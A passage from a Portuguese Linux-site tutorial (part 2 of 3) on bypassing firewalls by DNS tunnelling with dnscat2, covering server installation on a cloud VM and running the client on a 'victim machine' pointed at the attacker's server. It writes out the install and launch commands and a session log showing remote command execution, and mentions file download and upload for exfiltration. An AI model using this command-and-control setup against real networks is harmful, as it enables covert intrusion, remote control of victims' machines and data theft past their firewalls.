Pular para o conteúdo

Bypass de firewall com tunelamento por DNS

Como utilizar uma ferramenta para Command & Control através de tunelamento DNS para burlar firewalls com regras para requisição de DNS liberadas.
Luiz Vieira luizvieira
Hits: 16.501 Categoria: Linux Subcategoria: Segurança
  • Indicar
  • Impressora
  • Denunciar

Parte 2: Estrutura cliente/servidor

A primeira coisa que precisamos ter em mente é que essa ferramenta funciona no esquema de cliente/servidor. Portanto, é importante que tenha uma máquina virtual na cloud para servir de local para hospedar o server da ferramenta, como um droplet no Digital Ocean, por exemplo.

Após o deployment de sua VM na cloud, basta baixar e instalar o dnscat2 server, com os seguintes comandos:

# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install


E após instalar o server, para ativá-lo basta usar o comando abaixo, a partir de dentro do diretório dnscat2/server:

# ruby ./dnscat2.rb

Com isso feito, basta agora executar o cliente na máquina vítima, ou de sua máquina dentro da rede de onde quer fazer a conexão, usando simplesmente o parâmetro "--host [IP-do-server]". Caso a máquina de onde esteja rodando o cliente seja Windows, basta baixar o binário pré-compilado do site do desenvolvedor:
e executá-lo com o mesmo parâmetro (--host [IP-do-server]).

Assim que o cliente for executado, poderá perceber que no server você receberá o laerta de uma nova conexão existente com um cliente, como abaixo:

# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
dnscat2> New session established: 1258
dnscat2>
O que é mais interessante, é que a partir do server você poderá interagir com o cliente a qualquer momento, executando comandos e carregando aplicações definindo com qual sessão deseja interagir, como por exemplo:
dnscat2> session -i 1258
Welcome to a command session!
Use 'help' for a list of commands or ^z for the main menu
dnscat [command: 1258]> exec notepad.exe
Sent request to execute
dnscat [command: 1258]>


dnscat2 também suporta outros comandos, como download e upload, para exfiltragem de informações por exemplo.

   1. Introdução
   2. Estrutura cliente/servidor
   3. Usando um servidor DNS específico

Boot Linux - o que acontece quando ligamos o computador

SELinux - Security Enhanced Linux

Linux no Pendrive

Vulnerabilidade em mais de 6 milhões de sites com flash

Metasploit Framework

wlmproxy - um proxy superior

Instalação e configuração do HexChat com a rede Tor

Aplicação do firmware intel-microcode no Slackware

Shellter Project - Ferramenta para bypass de AV

Instalando e configurando o BackupPC

#1 Comentário enviado por cROMADO em 26/02/2016 - 04:12h
Interessante.
#2 Comentário enviado por SiLenT-MaN em 03/03/2016 - 10:15h
Não sei se funcionaria em layer7.

Contribuir com comentário

Entre na sua conta para comentar.